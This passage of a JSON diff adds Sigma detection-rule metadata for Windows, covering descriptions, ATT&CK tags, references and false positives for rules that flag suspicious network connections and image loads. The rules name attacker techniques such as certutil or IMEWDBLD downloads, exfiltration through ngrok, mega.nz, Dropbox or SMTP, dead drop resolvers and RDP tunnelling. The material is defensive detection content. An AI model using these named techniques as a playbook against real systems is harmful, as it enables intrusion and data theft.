+ "value": "WMI Persistence - Command Line Event Consumer", + "meta": { + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ], + "creation_date": "2018/03/07", + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads", + "meta": { + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ], + "creation_date": "2020/06/24", + "filename": "image_load_wsman_provider_image_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the Windows folder accessing github.com", + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication", + "meta": { + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2017/08/24", + "filename": "net_connection_win_binary_github_com.yml", + "author": "Michael Haag (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown", + "@subTee in your network" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint", + "meta": { + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2018/08/30", + "filename": "net_connection_win_binary_susp_com.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/09/02", + "filename": "net_connection_win_certutil.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "value": "Windows Crypto Mining Pool Connections", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ], + "creation_date": "2021/10/26", + "filename": "net_connection_win_crypto_mining.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers", + "meta": { + "refs": [ + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ], + "creation_date": "2022/08/17", + "filename": "net_connection_win_dead_drop_resolvers.yml", + "author": "Sorina Ionescu", + "level": "high", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution", + "attack.t1559.001" + ], + "creation_date": "2020/07/13", + "filename": "net_connection_win_dllhost_net_connections.yml", + "author": "bartblaze", + "level": "medium", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections from Equation Editor", + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection", + "meta": { + "refs": [ + "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "creation_date": "2022/04/14", + "filename": "net_connection_win_eqnedt.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections", + "meta": { + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ], + "creation_date": "2021/11/10", + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "level": "medium", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections", + "meta": { + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], + "creation_date": "2022/10/05", + "filename": "net_connection_win_hh.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/01/22", + "filename": "net_connection_win_imewdbld.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports", + "meta": { + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ], + "creation_date": "2017/03/19", + "filename": "net_connection_win_malware_backconnect_ports.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz", + "meta": { + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2021/12/06", + "filename": "net_connection_win_mega_nz.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "net_connection_win_msiexec.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io", + "meta": { + "refs": [ + "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ], + "creation_date": "2022/07/16", + "filename": "net_connection_win_ngrok_io.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service", + "meta": { + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ], + "creation_date": "2022/11/03", + "filename": "net_connection_win_ngrok_tunnel.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connection by Notepad", + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection", + "meta": { + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2020/05/14", + "filename": "net_connection_win_notepad_network_connection.yml", + "author": "EagleEye Team", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections", + "meta": { + "refs": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/13", + "filename": "net_connection_win_powershell_network_connection.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2021/12/10", + "filename": "net_connection_win_python.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate python script" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/02/16", + "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports", + "meta": { + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2022/04/29", + "filename": "net_connection_win_rdp_to_http.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity", + "meta": { + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/25", + "filename": "net_connection_win_regsvr32_network_activity.yml", + "author": "Dmitriy Lifanov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/09/12", + "filename": "net_connection_win_remote_powershell_session_network.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ], + "creation_date": "2017/11/04", + "filename": "net_connection_win_rundll32_net_connections.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "net_connection_win_script.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "net_connection_win_script_wan.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate scripts" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity", + "meta": { + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ], + "creation_date": "2020/10/11", + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "author": "Kiran kumar s, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/03", + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious network connection by Cmstp", + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection", + "meta": { + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ], + "creation_date": "2022/08/30", + "filename": "net_connection_win_susp_cmstp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": "Suspicious Dropbox API Usage", + "meta": { + "refs": [ + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/20", + "filename": "net_connection_win_susp_dropbox_api.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/07/14", + "filename": "net_connection_win_susp_epmap.yml", + "author": "frack113, Tim Shelton (fps)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection", + "meta": { + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ], + "creation_date": "2019/10/24", + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Other browsers" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "creation_date": "2022/04/28", + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "author": "elhoim", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2022/01/07", + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Other SMTP tools" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections", + "meta": { + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2017/03/19", + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections", + "meta": { + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/05/15", + "filename": "net_connection_win_susp_rdp.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "logsource.category": "network_connection", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection", + "meta": { + "refs": [ + "https://dtm.uk/wuauclt/", + 